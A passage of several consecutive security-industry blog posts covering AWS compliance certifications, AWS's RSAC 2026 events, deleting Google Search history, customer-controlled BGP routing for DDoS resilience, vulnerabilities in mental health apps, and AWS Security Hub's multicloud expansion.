These certifications confirm that AWS European Sovereign Cloud has integrated rigorous security, privacy, continuity, service delivery, and quality programs into a comprehensive framework, helping to ensure sensitive information remains secure, services remain available, and operations meet the highest standards through systematic risk management processes and continuous improvement practices.

How to access the reports

To access SOC 2, C5 reports and ISO certifications, customers should sign in to their AWS European Sovereign Cloud account and navigate to AWS Artifact in the AWS Management Console. AWS Artifact is a self-service portal that provides on-demand access to AWS compliance reports and certifications.

We recognize that compliance is not a destination but a continuous journey, and these initial SOC 2, C5 reports and ISO certifications represent the beginning of our certification portfolio. They lay the essential groundwork upon which we will continue to build to meet AWS European Sovereign Cloud customers’ compliance needs as they continue to evolve. As we expand our compliance coverage in the months ahead, customers can be confident that security, transparency, and regulatory alignment have been part of the very DNA of the AWS European Sovereign Cloud design from day one. To learn more about our compliance and security programs, visit AWS European Sovereign Cloud Compliance, or reach out to your AWS European Sovereign Cloud account team.

Security and compliance is a shared responsibility between AWS European Sovereign Cloud and the customer. For more information, see the AWS Shared Security Responsibility Model.

If you have feedback about this post, submit comments in the Comments section below.

Julian Herlinghaus

Julian is a Manager in AWS Compliance & Security Assurance based in Berlin, Germany. He is the third-party audit program lead for EMEA and has worked on compliance and assurance for the AWS European Sovereign Cloud. He previously worked as an information security department lead of an accredited certification body and has multiple years of experience in information security and security assurance and compliance.

Tea Jioshvili

Tea is a Manager in AWS Compliance & Security Assurance based in Berlin, Germany. She leads various third-party audit programs across Europe. She previously worked in security assurance and compliance, business continuity, and operational risk management in the financial industry for 20 years.

Atulsing Patil
Atulsing is a Compliance Program Manager at AWS. He has 29 years of consulting experience in information technology and information security management. Atulsing holds a Master of Science in Electronics degree and professional certifications such as CCSP, CISSP, CISM, ISO 42001 Lead Auditor, ISO 27001 Lead Auditor, HITRUST CSF, Archer Certified Consultant, and AWS CCP.


Security is a team sport: AWS at RSAC 2026 Conference

The RSAC 2026 Conference brings together thousands of professionals, practitioners, vendors, and associations to discuss issues covering the entire spectrum of cybersecurity—a place where innovation meets collaboration and the industry’s brightest minds converge to shape its future. This March, Amazon Web Services (AWS) returns to the annual RSAC Conference in San Francisco to share how unifying security and data empowers teams to protect AI-driven workloads while maximizing existing security investments.

Experience innovation at the AWS booth

Visit us at booth S-0466 in South Expo to experience three interactive demo kiosks:

  • The AWS Security Solutions kiosk features live demonstrations of AWS security services including new launches showcasing the latest cloud security innovations and how they work with partner solutions to provide comprehensive protection for your organization. Meet with AWS Security Specialists to discuss your specific security challenges.
  • The AWS Security Partners kiosk showcases live demos from more than 20 AWS Partners, demonstrating how these partners integrate seamlessly with AWS to address your most critical security challenges.
  • The Humanoid Security Guardian kiosk offers an interactive AI-powered experience that generates customized well-architected framework guides, delivered through QR code for implementation reference.

Partner Passport program: Stop by the AWS booth to pick up your playbook to start exploring integrated AWS Partner security solutions across the show floor. Visit participating partner booths throughout the conference to learn about joint solutions that combine AWS infrastructure with partner innovations. After you’ve received all partner booth visit stamps, you’ll receive AWS swag and entry into a daily raffle to win an exclusive prize.

Beyond the booth: Deep dive sessions and hands-on workshops

AWS security experts will be sharing insights across four sessions throughout RSAC 2026 Conference. These sessions cover the most pressing challenges in AI security, from privacy-by-design principles to preparing for AI-native incidents. Don’t miss learning directly from AWS experts in these sessions.

Privacy by Design in the AI Era | Reserve a seat
Monday, March 23, 2026 | 8:30 AM–9:20 AM PDT
Attendees will learn how to design AI systems with privacy embedded from the start. This session will cover data minimization strategies, architectural patterns for consent-aware decision-making, and practical approaches for building privacy-respecting AI in dynamic environments. Speakers: Juan David Alvares Builes, Senior Security Consultant, Amazon Web Services and Zully Romero, Security and Solutions Architect, Bancolombia.

Trusted Identity Propagation for Autonomous Agents Across Cloud & SaaS | Reserve a seat
Monday, March 23, 2026 | 9:40 AM–10:30 AM PDT
This session will explore trusted identity propagation for autonomous agents across cloud, SaaS, and multi-domain environments. Compare AWS, Azure, Apple, and Cloudflare approaches, focusing on identity continuity, credential management, and privacy-aware designs for secure, agent-driven enterprise systems. Speakers: Swara Gandhi, Senior Solutions Architect, Amazon Web Services and Vijeth Lomada, Lead AI Engineer, Adobe.

How to Secure Containerized Applications from Supply Chain Attacks | Reserve a seat
Monday, March 23, 2026 | 1:10 PM–2:00 PM PDT
Software supply chain attacks target development pipelines to inject malicious code into container images and dependencies. This session demonstrates how to secure containerized applications through automated scanning, Software Bill of Materials (SBOM) generation, and image signing. Learn to implement security controls in CI/CD pipelines using open-source and commercial solutions. Speakers: Patrick Palmer, Principal Security Solutions Architect, Amazon Web Services and Monika Vu Minh, Quantitative Technologist, Qube Research & Technologies.

From Prompt to Pager: Preparing for AI-Native Incidents Now | Reserve a seat
Wednesday, March 25, 2026 | 1:15 PM–2:05 PM PDT
AI incidents start as prompts and end as actions like code edits, SQL writes, workflow changes, yet most playbooks are not ready. This talk will explain why AI incidents differ, show where classic guardrails miss, and share field-tested steps to prepare now: log model-generated actions, add pre/post-conditions, capture provenance, limit blast radius, and rehearse one AI-native scenario. Speaker: Aviral Srivastava, Security Engineer, Amazon

AWS activities and events

AWS will host events at Cloud Village, an interactive community space where security practitioners explore offensive and defensive cloud security through hands-on activities, technical talks, and collaborative discussions. AWS is hosting two technical workshops that provide hands-on practical skills security teams can implement immediately. AWS has also crafted multiple capture the flag (CTF) community challenges at both RSAC 2026 Conference and BSidesSF that advance the broader security community’s capabilities, built by the same team behind the AWS Vulnerability Disclosure Program, through which researchers can responsibly report security concerns directly to AWS. Cloud Village will be located in Moscone South, Level 2, Room 204 and is open to All Access Pass and Expo Plus Pass holders.

Finally, you can also join us at a customer soiree AWS is co-hosting with CrowdStrike on Wednesday, March 25 at The Mint, for an evening of discovery where artists, thinkers, and leaders gather to challenge convention, shape the future, and have some fun. Register to join us.

If you’re looking for opportunities for meaningful connections across the security community, AWS is hosting several events throughout the week.

Join us in San Francisco

Whether you’re exploring how to secure AI workloads, seeking to unify security across distributed environments, or looking to optimize your security data strategy, the AWS team at RSAC 2026 Conference is ready to collaborate. Visit booth S-0466 in South Expo, attend our technical workshops at the Cloud Village, or join AWS-led sessions. You can also schedule time to meet with AWS experts for more in-depth discussions. Together, we’ll demonstrate that when it comes to cybersecurity, we’re all on the same team.

Learn more about AWS Security solutions at aws.amazon.com/security
See you in San Francisco, March 23–26, 2026.

Idaliz Seymour
Idaliz is a Product Marketing Manager at AWS Security, specializing in helping organizations understand the value of network and application protection in the cloud. In her free time, you’ll find her reading or boxing.

How to see your Google Search history (and delete it)

Your Google Search history provides one of the most detailed windows into your private life, and I know this because when I looked at my own search history last year, I was overwhelmed by the information buried within.

Across just 18 months, Google tracked the 8,079 searches I made and the 3,050 websites I visited because of those searches. That included my late-night perusal of WebMD because of medical symptoms I’d looked up just seconds before, my tour of Goodwill donation sites as I searched for where to drop off clothes ahead of an upcoming move, and my ironically tracked visit to a Reddit thread titled “How do I delete most, if not all, of my info off of the Internet?” (One answer I learned: Don’t use Google Search.)

Google tracked my every question, concern, and flight of fancy—almost literally. On just one day in August 2025, Google recorded the seven flight searches I made on Google Flights and the six hotel searches I made on Google Travel.

Google also recorded the many questions and requests I made when researching topics for the Lock and Code podcast, which I host. And while all of that Google data made for an interesting investigation into what Google knows about me (which you can listen to below), it also made it clear that more people should know how to access this same information.

For most Google users, if Web & App Activity is turned on, Google is saving what they look up, what time they looked it up, and what websites they clicked on as a result. There are ways to turn that data tracking off, but the first step is to know where to look.

Here’s how to do that.

How to find your Google Search history

You can start by opening your web browser and signing into Google’s centralized hub for your data online at myactivity.google.com.

[Screenshot: the My Google Activity home page]

Once logged in, you’ll see the above welcome screen with quick settings that you can change, if you want to. Those settings are different for some users, but may include:

  • Web & App Activity
  • Timeline
  • Play History
  • YouTube History

Further down on the page, you can browse through your Google Search history. (Our screenshot gallery below can help walk you through the steps.)

  • First, look for the search bar in the welcome screen that says Search your activity.
  • Right below, you will find the words Filter by date & product. These words are clickable. Click them.
  • Once you’ve clicked Filter by date & product, you’ll see a pop-up menu where you can look through your Google activity by date or product. Instead of focusing on the date, scroll down through the list of Google products and check the box for Google Search.
  • Press Apply.
[Screenshot gallery: locating the search bar, clicking "Filter by date & product", and selecting the Google Search checkbox]

After you press Apply, you’ll be taken to a webpage that lists your Google Search history in reverse chronological order, showing you your most recent activity first. As you scroll down, you can find older activity. You can also use the search bar at the top of the page to look for individual pieces of activity, like a search or series of searches that you previously made.

From here, you can also delete individual Google Search entries so that Google no longer stores that data. This will only apply to the individual search you made.

  • You can delete individual searches by clicking the “X” button in the top right corner of each search record
  • Confirm your deletion by pressing “Delete”
  • Your search is now no longer tied to your overall Google activity

If you want to better protect your privacy, making targeted deletions from your Google Search history is a difficult, lengthy, and imperfect method. Instead, you can simply tell Google to stop recording any of your searches from now on.

How to turn off Google Search history

There’s a simple way to instruct Google to stop saving your online searches to your Google Account, and it takes just a few clicks. Follow the instructions below, along with the image gallery, for guidance.

  • Go to your My Google Activity homepage (this is the same page you saw when first signing into myactivity.google.com)
  • Click on that quick control button we saw earlier: Web & App Activity
  • From here, you will see a new screen with the title Activity Controls
  • Find the button that says Turn off and click it
  • Choose between Turn off and Turn off and delete activity
[Screenshot gallery: the "Turn off" button and the two turn-off options on the Activity Controls page]

If you selected Turn off, you’re done. Google will no longer save your Google Searches as part of your overall Google profile activity. This option means that Google still has your prior searches recorded, though. So, if you want, you can choose the second option, Turn off and delete activity.

When you select that option, Google will walk you through additional steps to choose what types of data you want erased, such as past activity tied to Google Search, Maps, Ads, Image Search, Google Play Store, Help and other services. All of these options reveal just how many products and pipelines Google has built to vacuum up your data.

Don’t be overwhelmed, though. Go through the list at your own pace and start making decisions about your data that are right for you.


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.


When your DDoS mitigation provider goes down: Why traffic control can’t be outsourced

Since the headline-grabbing outages of 2021, we’ve had recurring conversations with large enterprises asking some version of the same question.

Do we really want our CDN, security, and routing control to live in the same place?

This issue of control has become more urgent after a series of well-publicized, multi-hour outages across major cloud-based DDoS protection and security platforms. These incidents are rare but appear to be increasing in frequency, and when they happen, they expose architectural decisions many organizations haven't revisited in years: architectures that assumed providers would never fail. Reality proved them wrong.

The concern isn’t whether cloud DDoS mitigation works. At scale, it does. The issue is control: whether customers retain the ability to reroute traffic independently if the provider itself goes down.

Many DDoS protection services simplify onboarding by originating customer prefixes and returning traffic via static paths. Under normal conditions, this works. During a provider outage, especially one affecting routing or orchestration, customers may lose the ability to reroute traffic independently. Recovery then depends on provider-side changes at the worst possible moment.

That’s when a DDoS mitigation service can become a single point of failure.

Protection and control are different problems

One thing we consistently hear from network and security teams is that DDoS attack mitigation and traffic control are often treated as the same problem. They aren’t.

Resilient architectures separate them:

Function                     Who should control it
Attack mitigation            DDoS provider
Traffic routing decisions    Customer network

The Internet already provides a mechanism to enforce this separation: the Border Gateway Protocol (BGP). This is the Internet's routing protocol; it determines how traffic is directed between networks.

So, the real question isn’t whether to use cloud‑based DDoS protection. It’s whether that protection operates with your routing policy, or instead of it.

In this model, providers absorb DDoS attacks while customers retain routing authority using BGP, enabling them to decide how traffic flows during failures.

When customers control BGP, outages take on a different character. They become routing events, not service outages. Traffic can be redirected faster, the blast radius is reduced, and network teams respond using familiar controls instead of escalation paths.
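As a hedged sketch of what retaining routing authority can look like in practice, the FRR/Cisco-style BGP configuration below originates the customer's own prefix and keeps an independent transit session alongside the scrubbing provider. All ASNs, prefixes, and neighbor addresses are documentation placeholders, not values from any real deployment:

```
! Illustrative only: ASNs, prefixes, and neighbor IPs are placeholders.
router bgp 64500
 ! The customer, not the mitigation provider, originates its own prefix.
 network 203.0.113.0/24
 ! Session toward the DDoS mitigation provider (scrubbing path).
 neighbor 198.51.100.1 remote-as 64601
 neighbor 198.51.100.1 route-map TO-SCRUBBER out
 ! Independent direct transit session, kept up as a fallback path.
 neighbor 192.0.2.1 remote-as 64701
 neighbor 192.0.2.1 route-map TO-TRANSIT out
!
! Prepending on the transit path makes the scrubber preferred in steady state.
! If the provider fails, removing the prepends shifts traffic to transit
! with a local change, not a provider-side ticket.
route-map TO-TRANSIT permit 10
 set as-path prepend 64500 64500 64500
!
route-map TO-SCRUBBER permit 10
```

The key property is that the announcement and the steering policy both live in equipment the customer controls, so a provider outage becomes a routing event the network team can act on directly.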


Designing for the inevitable

No provider is immune to failure. CDNs, hyperscalers, and DDoS mitigation services all operate complex, global control planes.

Resilience doesn’t come from assuming outages won’t happen. It comes from designing so that when they do, customers still control the outcome.

That’s why more organizations are adopting architectures where:

  • DDoS protection is cloud‑delivered
  • Routing authority remains customer‑owned
  • BGP is the final decision layer for traffic steering

This approach preserves the benefits of cloud‑scale mitigation while avoiding the creation of new single points of failure.

A practical next step

If you’re rethinking your DDoS architecture, your best starting point isn’t a product demo; it’s an architectural review. Here are some questions to ask yourself:

  • Who originates your prefixes today?
  • How quickly can you reroute traffic if a provider is unavailable?
  • What dependencies exist between mitigation availability and network availability?

Those answers usually reveal more than any outage postmortem.

On the Internet, control of routing is control of availability, and we think that control should always remain in customers' hands.

Want to discuss what customer‑controlled DDoS protection looks like in practice? Get in touch with Thales to review your architecture.



Mental health apps are leaking your private thoughts. How do you protect yourself? | Kaspersky official blog

In February 2026, the cybersecurity firm Oversecured published a report that makes you want to factory reset your phone and move into a remote cabin in the woods. Researchers audited 10 popular Android mental health apps — ranging from mood trackers and AI therapists to tools for managing depression and anxiety — and uncovered… 1575 vulnerabilities! Fifty-four of those flaws were classified as critical. Given the download stats on Google Play, as many as 15 million people could be affected. The real kicker? Six out of the ten apps tested explicitly promised users that their data was “fully encrypted and securely protected”.

We’re breaking down this scandalous “brain drain”: what exactly could leak, how it’s happening, and why “anonymity” in these services is usually just a marketing myth.

What was found in the apps

Oversecured is a mobile app security firm that uses a specialized scanner to analyze APK files for known vulnerability patterns across dozens of categories. In January 2026, researchers ran ten mental health monitoring apps from Google Play through the scanner — and the results were, shall we say, “spectacular”.

App type                             Installs   High   Medium   Low   Total
Mood & habit tracker                 10M+       1      147      189   337
AI therapy chatbot                   1M+        23     63       169   255
AI emotional health platform         1M+        13     124      78    215
Health & symptom tracker             500k+      7      31       173   211
Depression management tool           100k+      0      66       91    157
CBT-based anxiety app                500k+      3      45       62    110
Online therapy & support community   1M+        7      20       71    98
Anxiety & phobia self-help           50k+       0      15       54    69
Military stress management           50k+       0      12       50    62
AI CBT chatbot                       500k+      0      15       46    61
Total                                14.7M+     54     538      983   1575

Vulnerabilities found in the 10 tested mental health apps (source: Oversecured)

The anatomy of the flaws

The discovered vulnerabilities are diverse, but they all boil down to one thing: giving attackers access to data that should be under lock and key.

For starters, one class of vulnerability allows an attacker to invoke any internal activity of the app, including ones never intended to be reachable from outside. This opens the door to hijacking authentication tokens and user session data, and with those in hand, an attacker could effectively gain access to a user's therapy records.

Another issue is insecure local data storage with read permissions granted to any other app on the device. In other words, that random flashlight app or calculator on your smartphone could potentially read your cognitive behavioral therapy (CBT) logs, personal notes, and mood assessments.

The researchers also found unencrypted configuration data baked right into the APK installation files. This included backend API endpoints and hardcoded URLs for Firebase databases.

Furthermore, several apps were caught using the cryptographically weak java.util.Random class to generate session tokens and encryption keys.
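To make the weakness concrete, here is a minimal sketch of the fix (class and method names are illustrative, not taken from the audited apps): `java.util.Random` is a seedable linear congruential generator whose output stream an attacker can reconstruct after observing a few values, while `java.security.SecureRandom` draws from a cryptographically secure source and is the standard choice for session tokens and key material.

```java
import java.security.SecureRandom;
import java.util.Base64;

public class TokenDemo {
    // Hypothetical token generator illustrating the secure pattern.
    public static String generateToken() {
        // SecureRandom is a CSPRNG; java.util.Random is a predictable LCG
        // seeded from the clock and must never be used for tokens or keys.
        SecureRandom rng = new SecureRandom();
        byte[] bytes = new byte[32];              // 256 bits of entropy
        rng.nextBytes(bytes);
        // URL-safe base64 keeps the token usable in headers and URLs.
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    public static void main(String[] args) {
        System.out.println(generateToken());
    }
}
```

Swapping the class is a one-line change; `SecureRandom` exposes the same `nextBytes` interface as `Random`, so there is little excuse for shipping the weak variant.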

Finally, most of the tested apps lacked root/jailbreak detection. On a rooted device, any third-party app with root privileges could gain total access to every bit of locally stored medical data.

Shockingly, of the 10 apps analyzed, only four received updates in February 2026. The rest haven’t seen a patch since November 2025, and one hasn’t been touched since September 2024. Going 18 months without a security patch is a lifetime in this industry — especially for an app housing mood journals, therapy transcripts, and medication schedules.

Here’s a quick reminder of just how dangerous the misuse of this type of data gets. In 2024, the tech world was rocked by a sophisticated attack on XZ Utils, a critical component found in virtually every operating system based on the Linux kernel. The attacker successfully pressured the maintainer into handing over code commit permissions by exploiting the developer’s public admission of burnout and a lack of motivation to carry on with the project. Had the attack been completed, the damage would have been mind-boggling given that roughly 80% of the world’s servers run on Linux.

What could leak?

What do these apps collect and store? It’s the kind of stuff you’d likely only share with a trusted clinician: therapy session transcripts, mood logs, medication schedules, self-harm indicators, CBT notes, and various clinical assessment scales.

As far back as 2021, complete medical records were selling on the dark web for US$1000 each. For comparison, a stolen credit card number goes for anywhere between US$5 and US$30. Medical records contain a full identity package: name, address, insurance details, and diagnostic history. Unlike a credit card, you can’t exactly “reissue” your medical history. Furthermore, medical fraud is notoriously difficult to spot. While a bank might flag a suspicious transaction in hours, a fraudulent insurance claim for a phantom treatment can go unnoticed for years.

We’ve seen this movie before

The Oversecured study isn’t just an isolated horror story.

Back in 2020, Julius Kivimäki hacked the database of the Finnish psychotherapy clinic Vastaamo, making off with the records of 33 000 patients. When the clinic refused to cough up a €400 000 ransom, Kivimäki began sending direct threats to patients: “Pay €200 in Bitcoin within 24 hours, or else your records go public”. Ultimately, he leaked the entire database onto the dark web anyway. At least two people died by suicide, and the clinic was forced into bankruptcy. Kivimäki was eventually sentenced to six years and three months in prison, marking a record-breaking trial in Finland for the sheer number of victims involved.

In 2023, the U.S. Federal Trade Commission (FTC) slapped the online therapy giant BetterHelp with a US$7.8 million fine. Despite stating on their sign-up page that your data was strictly confidential, the company was caught funneling user info — including mental health questionnaire responses, emails, and IP addresses — to Facebook, Snapchat, Criteo, and Pinterest for targeted advertising. After the dust settled, 800 000 affected users received a grand total of… US$10 each in compensation.

By 2024, the FTC set its sights on the telehealth firm Cerebral, tagging them with a US$7 million fine. Through tracking pixels, Cerebral leaked the data of 3.2 million users to LinkedIn, Snapchat, and TikTok. The haul included names, medical histories, prescriptions, appointment dates, and insurance info. And the cherry on top? The company sent promotional postcards (sans envelopes) to 6000 patients, effectively broadcasting that the recipients were undergoing psychiatric treatment.

In September 2024, security researcher Jeremiah Fowler stumbled upon an exposed database belonging to Confidant Health, a provider specializing in addiction recovery and mental health services. The database contained audio and video recordings of therapy sessions, transcripts, psychiatric notes, drug test results, and even copies of driver’s licenses. In total, 5.3 terabytes of data, 126 000 files, or 1.7 million records were sitting there without a password.

Why anonymity is an illusion

Developers love to drop the line: “We never share your personal data with anyone.” Technically, that might be true — instead, they share “anonymized profiles”. The catch? De-anonymizing that data isn’t exactly rocket science anymore. Recent research highlights that using LLMs to strip away anonymity has become a routine reality.

Even the “anonymization” process itself is often a mess. A study by Duke University revealed that data brokers are openly hawking the mental health data of Americans. Out of 37 brokers surveyed, 11 agreed to sell data linked to specific diagnoses (like depression, anxiety, and bipolar disorder), demographic parameters, and in some cases, even names and home addresses. Prices started as low as US$275 for 5000 aggregated records.

According to the Mozilla Foundation, by 2023, 59% of popular mental health apps failed to meet even the most basic privacy standards, and 40% had actually become less secure than the previous year. These apps allowed account creation via third-party services (like Google, Apple, and Facebook), featured suspiciously brief privacy policies that glossed over data collection details, and employed a clever little loophole: some privacy policies applied strictly to the company’s website, but not the app itself. In short, your clicks on the site were “protected”, but your actions within the app were fair game.

How to protect yourself

Cutting these apps out of your life entirely is, of course, the most foolproof option — but it’s not the most realistic one. Besides, there’s no guarantee you can actually nuke the data already collected — even if you delete your account. We previously covered the grueling process of scrubbing your info from data broker databases; it’s possible, but prepare for a headache. So, how can you stay safe?

  • Check permissions before you hit “Install”. In Google Play, navigate to App description → About this app → Permissions. A mood tracker has no business asking for access to your camera, microphone, contacts, or precise GPS location. If it does, it’s not looking out for your well-being — it’s harvesting data.
  • Actually read the privacy policy. We get it — nobody reads these multi-page manifestos. But when a service is vacuuming up your most intimate thoughts, it’s worth a skim. Look for the red flags: does the company share data with third parties? Can you manually delete your records? Does the policy explicitly cover the app itself, or just the website? You can always feed the policy text into an AI and ask it to flag any privacy deal-breakers.
  • Check the last updated date. An app that hasn’t seen an update in over six months is likely a playground for unpatched vulnerabilities. Remember: six out of the 10 apps Oversecured tested hadn’t been touched in months.
  • Disable everything non-essential in your phone’s privacy settings. Whenever prompted, always select “ask not to track”. When an app pleads with you to enable a specific type of tracking — claiming it’s for “internal optimization” — it’s almost always a marketing ploy rather than a functional necessity. After all, if the app truly won’t work without a certain permission, you can always go back and toggle it on later.
  • Don’t use “Sign in with…” services. Authenticating via Facebook, Apple, Google, or Microsoft creates additional identifiers and gives companies a golden opportunity to link your data across different platforms.
  • Treat everything you type like a public social media post. If you wouldn’t want a random stranger on the internet reading it, you probably shouldn’t be typing it into an app with over 150 vulnerabilities that hasn’t seen a patch since the year before last.


AWS Security Hub is expanding to unify security operations across multicloud environments

After talking with many customers, one thing is clear: the security challenge has not gotten easier. Enterprises today operate across a complex mix of environments, including on-premises infrastructure, private data centers, and multiple clouds, often with tools that were never designed to work together. The result is that enterprise security teams spend more time managing tools than managing risk, making it harder to stay ahead of threats across an increasingly complex environment.

At Amazon Web Services (AWS), we believe security should be simple, integrated, and built for the way enterprises actually operate. This belief is what drove us to reimagine AWS Security Hub, delivering full-stack security through a single experience, and this vision is driving our next chapter.

Building on a foundation of unified security

We transformed Security Hub into a unified security operations solution by bringing together AWS security services, including Amazon GuardDuty, Amazon Inspector, AWS Security Hub Cloud Security Posture Management (Security Hub CSPM), and Amazon Macie, into a single experience that automatically and continuously analyzes security signals across threats, vulnerabilities, misconfigurations, and sensitive data. Security Hub delivers a common foundation, bringing together findings from across your AWS environment so your security team spends less time translating signals and more time acting on them. Built on top of that foundation, a unified operations layer gives security teams near real-time risk analytics, automated analysis, and prioritized insights, helping them focus on what matters most, at scale.

We also introduced new capabilities (the Extended plan) that simplify how enterprises procure, deploy, and integrate a full-stack security solution across endpoint, identity, email, network, data, browser, cloud, AI, and security operations. Now, customers can use Security Hub to expand their security portfolio through a curated selection of AWS Partner solutions (at launch: 7AI, Britive, CrowdStrike, Cyera, Island, Noma, Okta, Oligo, Opti, Proofpoint, SailPoint, Splunk (a Cisco company), Upwind, and Zscaler), all through one unified experience. With AWS as the seller of record, you benefit from pay-as-you-go pricing, a single bill, and no long-term commitments. Our goal is simple: unified security, everywhere your enterprise operates.

Freedom to innovate, wherever your workloads are

At AWS, interoperability means giving customers the freedom to choose solutions that best suit their needs, and the ability to use them wherever their workloads run. But freedom to innovate across multicloud environments also means that it is critical to secure them consistently, and without adding operational complexity.

What’s coming for Security Hub

In the coming months, we are expanding Security Hub with new multicloud capabilities that extend unified security operations beyond AWS. The foundation of this expansion is a common data layer that unifies security signals from wherever your workloads run. On top of that, a unified policy and operations layer delivers consistent posture management, exposure analysis, and risk prioritization, so your security team operates from a single view of risk rather than a fragmented collection of consoles.

Security Hub will deliver unified risk analytics that surface critical risks across your multicloud estate. You’ll be able to manage cloud security posture with Security Hub CSPM checks that give you consistent posture visibility, and extend vulnerability management with expanded Amazon Inspector capabilities, including virtual machine scanning, container image scanning, and serverless scanning. Security Hub will also deliver external network scanning that enriches security findings with context about internet-facing exposure across your multicloud environment, including for resources not running in AWS.

The result is more comprehensive risk coverage across your enterprise. It’s about giving your security team a single, unified experience to detect and respond to risks, wherever you operate.

Security as a business enabler

The security leaders I speak with aren’t just asking for better tools. They’re asking for a way to get ahead of risk, not just manage it. They want security that keeps pace with the business, not security that slows it down.

That’s the vision behind AWS Security Hub: unified security through a single, integrated security operations experience, built on a common data foundation, powered by intelligent analytics, and delivered through a consistent operations layer, to help reduce security risk, improve team productivity, and strengthen security operations across AWS and beyond.

Our multicloud expansion is underway, and we are just getting started.

You can learn more at aws.amazon.com/security-hub, or visit us at the AWS booth (S-0466) at RSA Conference, March 23–26 in San Francisco.

Gee Rittenhouse
Gee is the Vice President of Security Services at AWS, overseeing key services including Security Hub, GuardDuty, and Inspector. He holds a PhD from MIT and brings extensive leadership experience across enterprise security and cloud. He previously served as CEO of Skyhigh Security and Senior Vice President and General Manager of Cisco’s Security Business Group, where he was responsible for Cisco’s worldwide cybersecurity business.